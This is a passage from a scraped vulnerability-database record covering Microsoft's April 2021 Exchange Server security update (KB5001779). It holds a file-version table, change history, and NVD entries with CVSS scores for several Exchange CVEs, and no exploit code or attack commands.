29,136| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.security.dll| 15.0.1497.15| 804,328| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.0.1497.15| 19,976| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.0.1497.15| 216,032| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.0.1497.15| 413,152| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.0.1497.15| 190,944| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.0.1497.15| 95,736| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.0.1497.15| 82,936| 04-Apr-2021| 10:35| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.0.1497.15| 67,040| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.0.1497.15| 82,400| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.0.1497.15| 190,944| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.0.1497.15| 822,752| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.0.1497.15| 426,968| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.0.1497.15| 48,096| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.0.1497.15| 561,120| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.0.1497.15| 784,864| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.0.1497.15| 30,688| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.0.1497.15| 118,744| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.0.1497.15| 738,280| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.0.1497.15| 93,144| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.0.1497.15| 34,784| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.servicehost.exe| 15.0.1497.15| 54,752| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.0.1497.15| 49,144| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.services.dll| 15.0.1497.15| 7,786,488| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.0.1497.15| 214,536| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.0.1497.15| 58,864| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.0.1497.15| 84,984| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.setup.common.dll| 15.0.1497.15| 308,200| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.0.1497.15| 35,848| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.setup.console.dll| 15.0.1497.15| 27,632| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.setup.gui.dll| 15.0.1497.15| 120,808| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.setup.parser.dll| 15.0.1497.15| 54,256| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.0.1497.15| 22,992| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.sharedcache.exe| 15.0.1497.15| 56,824| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.0.1497.15| 29,648| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.sqm.dll| 15.0.1497.15| 48,064| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.store.service.exe| 15.0.1497.15| 25,056| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.store.worker.exe| 15.0.1497.15| 26,592| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.storedriver.dll| 15.0.1497.15| 77,272| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.storeprovider.dll| 15.0.1497.15| 998,376| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.0.1497.15| 15,864| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.textprocessing.dll| 15.0.1497.15| 151,504| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.0.1497.15| 24,576| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.0.1497.15| 96,256| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.0.1497.15| 22,544| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.0.1497.15| 20,496| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.0.1497.15| 217,104| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.0.1497.15| 103,920| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.0.1497.15| 17,920| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.0.1497.15| 133,080| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.0.1497.15| 21,520| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.0.1497.15| 29,696| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.0.1497.15| 48,120| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.0.1497.15| 30,224| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.0.1497.15| 54,272| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.0.1497.15| 28,664| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.0.1497.15| 17,920| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.0.1497.15| 45,056| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.transport.common.dll| 15.0.1497.15| 39,408| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.transport.dll| 15.0.1497.15| 3,539,976| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.0.1497.15| 73,720| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.0.1497.15| 59,896| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.0.1497.15| 21,488| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.0.1497.15| 61,936| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.0.1497.15| 27,624| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.transport.storage.dll| 15.0.1497.15| 35,336| 04-Apr-2021| 10:36| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.0.1497.15| 17,928| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.0.1497.15| 515,584| 04-Apr-2021| 10:39| x86 \nMicrosoft.exchange.transport.sync.manager.dll| 15.0.1497.15| 316,928| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.0.1497.15| 47,112| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.0.1497.15| 1,079,784| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.0.1497.15| 18,408| 04-Apr-2021| 10:38| x86 \nMicrosoft.exchange.um.callrouter.exe| 15.0.1497.15| 22,520| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.um.clientstrings.dll| 15.0.1497.15| 63,480| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 15.0.1497.15| 244,728| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.0.1497.15| 967,160| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.um.umcore.dll| 15.0.1497.15| 1,515,512| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.0.1497.15| 40,440| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.0.1497.15| 23,040| 04-Apr-2021| 10:35| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.0.1497.15| 38,896| 04-Apr-2021| 10:34| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.0.1497.15| 761,808| 04-Apr-2021| 10:37| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.0.1497.15| 193,536| 04-Apr-2021| 10:32| x86 \nMicrosoft.filtering.exchange.dll| 15.0.1497.15| 47,592| 04-Apr-2021| 10:35| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.0.1497.15| 47,088| 04-Apr-2021| 10:35| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 23,734| 04-Apr-2021| 10:33| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,365| 04-Apr-2021| 10:33| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.0.1497.15| 1,170,960| 04-Apr-2021| 10:37| x86 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.0.1497.15| 31,248| 04-Apr-2021| 10:37| x86 \nMicrosoft.forefront.reporting.common.dll| 15.0.1497.15| 42,456| 04-Apr-2021| 10:36| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.0.1497.15| 37,848| 04-Apr-2021| 10:36| x86 \nMicrosoft.isam.esent.interop.dll| 15.0.1497.15| 473,584| 04-Apr-2021| 10:35| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.0.1497.15| 80,368| 04-Apr-2021| 10:34| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.0.1497.15| 1,244,112| 04-Apr-2021| 10:37| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.0.1497.15| 51,688| 04-Apr-2021| 10:34| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.0.1497.15| 28,160| 04-Apr-2021| 10:38| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.0.1497.15| 544,704| 04-Apr-2021| 10:37| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.0.1497.15| 166,400| 04-Apr-2021| 10:38| x86 \nMicrosoft.office.datacenter.workertaskframeworkinternalprovider.dll| 15.0.1497.15| 252,368| 04-Apr-2021| 10:37| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,190| 04-Apr-2021| 10:33| Not applicable \nMovemailbox.ps1| Not applicable| 61,276| 04-Apr-2021| 10:33| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,670| 04-Apr-2021| 10:33| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 35,202| 04-Apr-2021| 10:33| Not applicable \nMsexchangedagmgmt.exe| 15.0.1497.15| 22,968| 04-Apr-2021| 10:35| x86 \nMsexchangedelivery.exe| 15.0.1497.15| 31,712| 04-Apr-2021| 10:34| x86 \nMsexchangefrontendtransport.exe| 15.0.1497.15| 25,600| 04-Apr-2021| 10:36| x86 \nMsexchangehmhost.exe| 15.0.1497.15| 25,600| 04-Apr-2021| 10:38| x86 \nMsexchangehmworker.exe| 15.0.1497.15| 34,832| 04-Apr-2021| 10:38| x86 \nMsexchangemailboxassistants.exe| 15.0.1497.15| 2,391,512| 04-Apr-2021| 10:34| x86 \nMsexchangemailboxreplication.exe| 15.0.1497.15| 20,408| 04-Apr-2021| 10:35| x86 \nMsexchangemigrationworkflow.exe| 15.0.1497.15| 46,008| 04-Apr-2021| 10:34| x86 \nMsexchangerepl.exe| 15.0.1497.15| 66,000| 04-Apr-2021| 10:35| x86 \nMsexchangesubmission.exe| 15.0.1497.15| 61,920| 04-Apr-2021| 10:34| x86 \nMsexchangethrottling.exe| 15.0.1497.15| 40,440| 04-Apr-2021| 10:34| x86 \nMsexchangetransport.exe| 15.0.1497.15| 77,296| 04-Apr-2021| 10:34| x86 \nMsexchangetransportlogsearch.exe| 15.0.1497.15| 143,360| 04-Apr-2021| 10:35| x86 \nMspatchlinterop.dll| 15.0.1497.15| 53,688| 04-Apr-2021| 10:33| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 22,332| 04-Apr-2021| 10:33| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,647| 04-Apr-2021| 10:33| Not applicable \nOwaauth.dll| 15.0.1497.15| 91,576| 04-Apr-2021| 10:33| x64 \nPowershell.rbachostingtools.dll_1bf4f3e363ef418781685d1a60da11c1| 15.0.1497.15| 41,392| 04-Apr-2021| 10:34| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 71,063| 04-Apr-2021| 10:33| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,297| 04-Apr-2021| 10:33| Not applicable \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 46,546| 04-Apr-2021| 10:33| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 20,808| 04-Apr-2021| 10:33| Not applicable \nRemoteexchange.ps1| Not applicable| 21,869| 04-Apr-2021| 10:33| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,799| 04-Apr-2021| 10:33| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,119| 04-Apr-2021| 10:33| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,129| 04-Apr-2021| 10:33| Not applicable \nResetattachmentfilterentry.ps1| Not applicable| 15,544| 04-Apr-2021| 10:33| Not applicable \nResetcasservice.ps1| Not applicable| 21,775| 04-Apr-2021| 10:33| Not applicable \nRightsmanagementwrapper.dll| 15.0.1497.15| 79,272| 04-Apr-2021| 10:34| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,854| 04-Apr-2021| 10:33| Not applicable \nRpcproxyshim.dll| 15.0.1497.15| 40,360| 04-Apr-2021| 10:34| x64 \nRwsperfcounters.xml| Not applicable| 23,032| 04-Apr-2021| 10:33| Not applicable \nSearchdiagnosticinfo.ps1| Not applicable| 16,880| 04-Apr-2021| 10:33| Not applicable \nSetup.exe| 15.0.1497.15| 20,976| 04-Apr-2021| 10:37| x86 \nSetupui.exe| 15.0.1497.15| 49,152| 04-Apr-2021| 10:36| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 104,516| 04-Apr-2021| 10:33| Not applicable \nStoretsconstants.ps1| Not applicable| 15,878| 04-Apr-2021| 10:33| Not applicable \nStoretslibrary.ps1| Not applicable| 28,055| 04-Apr-2021| 10:34| Not applicable \nTranscodingservice.exe| 15.0.1497.15| 124,328| 04-Apr-2021| 10:34| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,775| 04-Apr-2021| 10:34| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,485| 04-Apr-2021| 10:34| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,081| 04-Apr-2021| 10:34| Not applicable \nUglobal.js| Not applicable| 866,860| 04-Apr-2021| 09:57| Not applicable \nUmservice.exe| 15.0.1497.15| 102,920| 04-Apr-2021| 10:35| x86 \nUmworkerprocess.exe| 15.0.1497.15| 38,392| 04-Apr-2021| 10:35| x86 \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,098| 04-Apr-2021| 10:33| Not applicable \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,591| 04-Apr-2021| 10:33| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 30,135| 04-Apr-2021| 10:03| Not applicable \nWsbexchange.exe| 15.0.1497.15| 124,840| 04-Apr-2021| 10:37| x64 \n_search.mailboxoperators.a| 15.0.1497.15| 130,512| 04-Apr-2021| 10:39| Not applicable \n_search.mailboxoperators.b| 15.0.1497.15| 130,512| 04-Apr-2021| 10:39| Not applicable \n_search.tokenoperators.a| 15.0.1497.15| 80,336| 04-Apr-2021| 10:37| Not applicable \n_search.tokenoperators.b| 15.0.1497.15| 80,336| 04-Apr-2021| 10:37| Not applicable \n_search.transportoperators.a| 15.0.1497.15| 43,976| 04-Apr-2021| 10:37| Not applicable \n_search.transportoperators.b| 15.0.1497.15| 43,976| 04-Apr-2021| 10:37| Not applicable \n \n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## Change history\n\nThe following table summarizes the most important changes to this topic.Date| Description \n---|--- \nJune 25, 2021| Updated the \"Known issues in this update\" section by adding issues 2 through 4. \nAugust 24, 2021| Added three items (34473, 34523, and 33766) to the CVE list.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: April 13, 2021 (KB5001779)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483", "CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-07-13T07:00:00", "id": "KB5001779", "href": "https://support.microsoft.com/en-us/help/5001779", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-27T14:35:34", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28482, CVE-2021-28483.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T20:15:00", "type": "cve", "title": "CVE-2021-28481", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-14T12:58:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-28481", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28481", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:35:34", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28481, CVE-2021-28482, CVE-2021-28483.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T20:15:00", "type": "cve", "title": "CVE-2021-28480", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-14T13:00:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-28480", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28480", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:35:34", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28481, CVE-2021-28482.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-13T20:15:00", "type": "cve", "title": "CVE-2021-28483", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-14T13:01:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-28483", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28483", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:35:34", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28481, CVE-2021-28483.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T20:15:00", "type": "cve", "title": "CVE-2021-28482", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-14T12:58:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-28482", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28482", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:29:20", "description": "Microsoft Exchange Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-33766", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-07-16T14:41:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", 